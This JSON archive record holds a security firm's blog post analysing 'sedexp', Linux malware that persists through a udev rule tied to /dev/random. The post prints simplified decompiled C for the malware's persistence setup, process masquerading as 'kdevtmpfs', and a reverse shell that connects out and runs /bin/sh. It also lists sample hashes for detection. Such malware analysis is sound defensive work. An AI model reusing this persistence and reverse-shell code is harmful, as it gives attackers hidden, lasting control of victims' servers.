{
	"id": "b7df60ec-8076-4531-87dc-31b408524174",
	"created_at": "2026-04-06T00:14:20.711454Z",
	"updated_at": "2026-04-10T13:12:19.704582Z",
	"deleted_at": null,
	"sha1_hash": "d67679ac0e18d2b25358cde1ff8a661611bd6fd7",
	"title": "Unveiling sedexp: A Stealthy Linux Malware Exploiting udev Rules",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 68324,
	"plain_text": "Unveiling sedexp: A Stealthy Linux Malware Exploiting udev Rules\r\nBy Zachary Reichert\r\nPublished: 2024-08-19 · Archived: 2026-04-05 17:38:08 UTC\r\nAugust 19, 2024 4 Minute Read\r\nStroz Friedberg identified a stealthy malware, dubbed “sedexp,” utilizing Linux\r\nudev rules to achieve persistence and evade detection. This advanced threat, active\r\nsince 2022, hides in plain sight while providing attackers with reverse shell\r\ncapabilities and advanced concealment tactics.\r\nIntroduction\r\nStroz Friedberg recently identified active usage of a lesser-known Linux persistence technique by an as-yet\r\nunidentified piece of malware, dubbed “sedexp,” during an investigation. Despite the malware being in use since\r\nat least 2022, Stroz Friedberg has found multiple instances available in online sandboxes with zero detections.  At\r\nthe time of this writing, the persistence technique used is not documented by MITRE ATT\u0026CK. This blog details\r\nthe active use of this malware and its persistence technique by a financially motivated threat actor.\r\nBackground on udev Rules\r\nSedexp utilizes udev rules to maintain persistence. The malware hides the rules utilizing memory manipulation\r\ntechniques detailed later in this post.\r\nudev is a device management system for the Linux kernel, responsible for managing device nodes in the /dev\r\ndirectory. It dynamically creates or removes device node files, handles hotplug events to configure new devices,\r\nand loads drivers as necessary. udev rules are configuration files used by udev to match devices and execute\r\nactions in response to events such as adding or removing devices.\r\nFor example, when a USB device is plugged in, udev uses rules to determine the proper drivers to load and what\r\nactions to take. These rules are stored in files typically found in /etc/udev/rules.d/ or /lib/udev/rules.d/. Each rule\r\nconsists of conditions to match specific devices and corresponding actions to perform. A typical udev rule might\r\nlook like this:\r\nACTION==\"add\", KERNEL==\"sdb1\", RUN+=\"/path/to/script\"\r\nIn this rule:\r\nACTION==\"add\" specifies that the rule applies when a device is added.\r\nKERNEL==\"sdb1\" matches the device name. \\\r\nRUN+=\"/path/to/script\" specifies a script to run when the rule conditions are met.\r\nhttps://www.aon.com/en/insights/cyber-labs/unveiling-sedexp\r\nPage 1 of 4\n\nTechnical Analysis\r\nPersistence through udev Rules\r\nDuring a recent investigation, Stroz Friedberg discovered malware using udev rules to maintain persistence. This\r\ntechnique allows the malware to execute every time a specific device event occurs, making it stealthy and difficult\r\nto detect. The udev rule identified is as follows:\r\nACTION==\"add\", ENV{MAJOR}==\"1\", ENV{MINOR}==\"8\", RUN+=\"asedexpb run:+\"\r\nBreaking down the rule:\r\nACTION==\"add\": This rule triggers when a device is added to the system.\r\nENV{MAJOR}==\"1\": This condition checks if the device's major number is 1, typically associated with\r\nmemory devices such as /dev/mem, /dev/null, and /dev/zero.\r\nENV{MINOR}==\"8\": This condition checks if the device's minor number is 8, which corresponds to\r\n/dev/random for major number 1.\r\nRUN+=asedexpb: When the above conditions are met, the program or script asedexpb is executed along\r\nwith any arguments.\r\nThis rule ensures that the malware is run whenever /dev/random is loaded. /dev/random is a special file that serves\r\nas a random number generator, used by various system processes and applications to obtain entropy for\r\ncryptographic operations, secure communications, and other functions requiring randomness. It is loaded by the\r\noperating system on every reboot, meaning this rule would effectively ensure that the sedexp script is run upon\r\nsystem reboot.\r\nMalware Capabilities\r\nThe sedexp malware has notable features such as:\r\nReverse Shell Capability: It includes a reverse shell, allowing the threat actor to maintain control over the\r\ncompromised system.\r\nMemory Modification for Stealth: The malware modifies memory to hide any file containing the string\r\n\"sedexp\" from commands like ls or find. In Stroz Friedberg’s investigation, this capability was used to\r\nconceal webshells, modified Apache configuration files, and the udev rule itself.\r\nCode Analysis\r\nThe decompiled code reveals several steps that the sedexp malware takes to ensure its persistence and stealth.\r\nHere are key parts simplified for clarity:\r\nMemory Allocation and Argument Handling:\r\nThe malware manipulates arguments to obfuscate its presence.\r\nIt changes the process name to kdevtmpfs using prctl to blend in with legitimate system processes.\r\nhttps://www.aon.com/en/insights/cyber-labs/unveiling-sedexp\r\nPage 2 of 4\n\nvoid *memory = calloc(arg_count + 1, sizeof(void *)); for (int i = 0; i \u003c arg_count; i++) { memory[i]\r\n= strdup(arguments[i]); memset(arguments[i], 0, strlen(arguments[i])); } arguments[0] = \"kdevtmpfs\";\r\nprctl(PR_SET_NAME, \"kdevtmpfs\", 0, 0, 0);\r\nPersistence Setup: The malware sets up persistence by copying itself to a specific location and creating a\r\nudev rule.\r\nchar buffer[4096]; if (readlink(\"/proc/self/exe\", buffer, sizeof(buffer) - 1) != -1) { char\r\nnew_path[1024]; snprintf(new_path, sizeof(new_path), \"/lib/udev/%s\", basename(buffer)); system(\"cp -f\r\n%s %s \u0026\u0026 sync\", buffer, new_path); char rule_path[1024]; snprintf(rule_path, sizeof(rule_path),\r\n\"/etc/udev/rules.d/99-%s.rules\", basename(buffer)); FILE *rule_file = fopen(rule_path, \"w+\"); if\r\n(rule_file) { fprintf(rule_file, \"ACTION==\\\"add\\\", ENV{MAJOR}==\\\"1\\\", ENV{MINOR}==\\\"8\\\", RUN+=\\\"%s\r\n%s:+\\\"\\n\", new_path, \"run\"); fclose(rule_file); } else { exit(-1); } } else { exit(-1); }\r\nReverse Shell Execution: Depending on the input, it can set up a reverse shell, either using forkpty or\r\ncreating pipes and forking a new process.\r\nint socket_fd = socket(AF_INET, SOCK_STREAM, 0); struct sockaddr_in addr; addr.sin_family = AF_INET;\r\naddr.sin_port = htons(port); addr.sin_addr.s_addr = inet_addr(ip_address); connect(socket_fd, (struct\r\nsockaddr *)\u0026addr, sizeof(addr)); dup2(socket_fd, STDIN_FILENO); dup2(socket_fd, STDOUT_FILENO);\r\ndup2(socket_fd, STDERR_FILENO); execl(\"/bin/sh\", \"sh\", NULL);\r\nThreat Intelligence\r\nOur analysis revealed that the malware was employed by a financially motivated threat actor. Key threat\r\nintelligence findings include:\r\nCredit Card Scraping: The malware was used to hide credit card scraping code on a webserver, indicating\r\na focus on financial gain.\r\nOSINT Findings: Multiple public instances of this malware on an online sandbox had zero detections,\r\nhighlighting its stealthy nature.\r\nHistorical Use: This malware has been in use since at least 2022.\r\nConclusion\r\nThe discovery of sedexp demonstrates the evolving sophistication of financially motivated threat actors beyond\r\nransomware. Leveraging rarely utilized persistence techniques like udev rules highlights the need for thorough\r\nand advanced forensic analysis. Organizations should continuously update their detection capabilities, implement\r\ncomprehensive security measures to mitigate such threats, and ensure a capable DFIR firm is engaged to complete\r\na forensic review of any possibly compromised servers.\r\nSamples\r\nBelow are hashes of additional public samples discovered by Stroz Friedberg. Many online sandboxes detect few\r\nor no detections at the time this blog was released:\r\nhttps://www.aon.com/en/insights/cyber-labs/unveiling-sedexp\r\nPage 3 of 4\n\nSHA256 43f72f4cdab8ed40b2f913be4a55b17e7fd8a7946a636adb4452f685c1ffea02\r\nSHA256\r\n94ef35124a5ce923818d01b2d47b872abd5840c4f4f2178f50f918\r\n855e0e5ca2\r\nSHA256 b981948d51e344972d920722385f2370caf1e4fac0781d508bc1f088f477b648\r\nContributors: Daniel Stein and Joshua Pivirotto.\r\nSource: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp\r\nhttps://www.aon.com/en/insights/cyber-labs/unveiling-sedexp\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp"
	],
	"report_names": [
		"unveiling-sedexp"
	],
	"threat_actors": [],
	"ts_created_at": 1775434460,
	"ts_updated_at": 1775826739,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d67679ac0e18d2b25358cde1ff8a661611bd6fd7.pdf",
		"text": "https://archive.orkl.eu/d67679ac0e18d2b25358cde1ff8a661611bd6fd7.txt",
		"img": "https://archive.orkl.eu/d67679ac0e18d2b25358cde1ff8a661611bd6fd7.jpg"
	}
}